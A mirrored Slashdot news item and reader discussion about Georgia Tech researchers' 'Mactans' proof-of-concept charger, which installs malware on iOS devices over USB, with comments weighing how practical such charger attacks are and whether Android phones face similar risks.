Slashdot Mirror
Researchers Infect iOS Devices With Malware Via Malicious Charger
Sparrowvsrevolution writes "At the upcoming Black Hat security conference in late July, three researchers at the Georgia Institute of Technology plan to show off a proof-of-concept charger that they say can be used to invisibly install malware on a device running the latest version of Apple's iOS. A description of their talk posted to the conference website describes how they were able to install whatever malware they wished on an Apple device within a minute of the user plugging it into their malicious charger, which they're calling 'Mactans' after the scientific name of a Black Widow spider. The malware-loaded USB plug is built around an open-source single-board computer known as a BeagleBoard, sold by Texas Instruments for a retail price of around $45. The researchers have contacted Apple about their exploit but haven't heard back from the company and aren't sharing more details of their hack until they do."
GP has already provided you with a potential scenario - presumably the chargers Vodafone fitted in London taxis were a USB socket and/or an iPod dock mounted in the passenger section of the taxi. The BeagleBoard could be anywhere in the taxi.
Plus, it's a proof of concept. It could certainly be miniaturised.
I doubt that any other smartphone OS is immune to this kind of attack, however.
The prototype being based in a big developer board means nothing. The exploit could be easily replicated in smaller boards that would fit just fine in regular chargers.
This is not an "open the device and latch on to some henceforth unprotected internal signal" attack vector. Attaching the phone to someone else's charger is not unusual behavior.
It's based on a BeagleBoard, which is larger than a business card. It's going to be tough to fool people into using a charger that looks like it swallowed half your iPhone.
Sure they will. In Spain there are charging kiosks with coin slots and cables going somewhere you can't see them and people use those all of the time. You forget that in most public charging situations you don't want just anyone to be able to unplug the thing and walk away with it.
Well, there's a continuum.
Sneaking into someone's office and putting a keylogger inline with their keyboard cable is an example of physical access making black-hat hacking easy.
Sneaking into the same office and plugging a PwnPlug or similar into the physical network is another example.
Those two are increasingly far from actually directly looking at filesystem blocks, but put you at an advantage compared to someone trying to get to a system from the other side of a firewall.
Why would you think that? Have you never attached a smartphone to a USB host? Of course the USB data lines are connected, and of course any smartphone will respond to communication attempts from a USB host, so there is absolutely no reason why other phones should not be vulnerable to some form of attack via USB.
I don't know about you, but I can only use the USB port to charge my Android phone. Also, when I connect my Android phone to my computer I generally get access to the data contents of the phone (documents, music, pictures, etc.). It seems pretty trivial to devise a "charger" that steals or destroys data on any phone that connects to it.
Data is the real treasure and thus is also the real threat of damage, but AFAIK you can also use the Android Debug Bridge to install programs to connected phones.
The road to tyranny has always been paved with claims of necessity.
Mines from a $5 (shipped) job from Hong Kong, charges quite fast. I assure you it's not licensed, knock off lightning cable and all.
I'm not sure what point you're trying to argue, but it sounds like you're a perfect candidate for a charger that distributes malware. How would you know if your current charger is not sending your data back to China?
"Our two-party system is like a bowl of shit looking at itself in a mirror." - Lewis Black
Yes, but not for charging. If you are paranoid you can buy or make a USB cable that is only for charging (data lines disconnected) and your charger will still operate normally and at full speed. If you make such a cable for your iOS device it will only charge at low speed.
This is also notable as an example of DRM gone bad and leading to a severe security problem.
const int one = 65536; (Silvermoon, Texture.cs)
SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
And in what way was it not obvious for the entire history of the iPhone that it could be reflashed through the USB?
There's a huge difference between reflashing something and gaining root to infect an existing install.
One is very obvious to the user because their phone is suddenly reflashed to some configuration that isn't the user's any more. The other could be incredibly subtle because there's no visible change to the user.
It's entirely possible that a similar attack could happen to Android devices as well (for example, run an ADB instance and have it auto-install and execute something whenever it detects a device with debugging enabled. My phone would be vulnerable to this kind of attack, because for convenience, I've got it set up to auto-enter debugging mode whenever it plugs into a device. I'm willing to accept that risk, but I'm not an idiot that insists that the risk isn't there.)
Thing is, it's just another example of how that device that you insist is so damn impregnable because it's from mother Apple can, in fact, be easily exploited. All it takes is for someone to do it. Just because it hasn't happened in the wild *yet* (that you know of) doesn't make you any safer than anyone else.
--Jeremy
Jesus was a liberal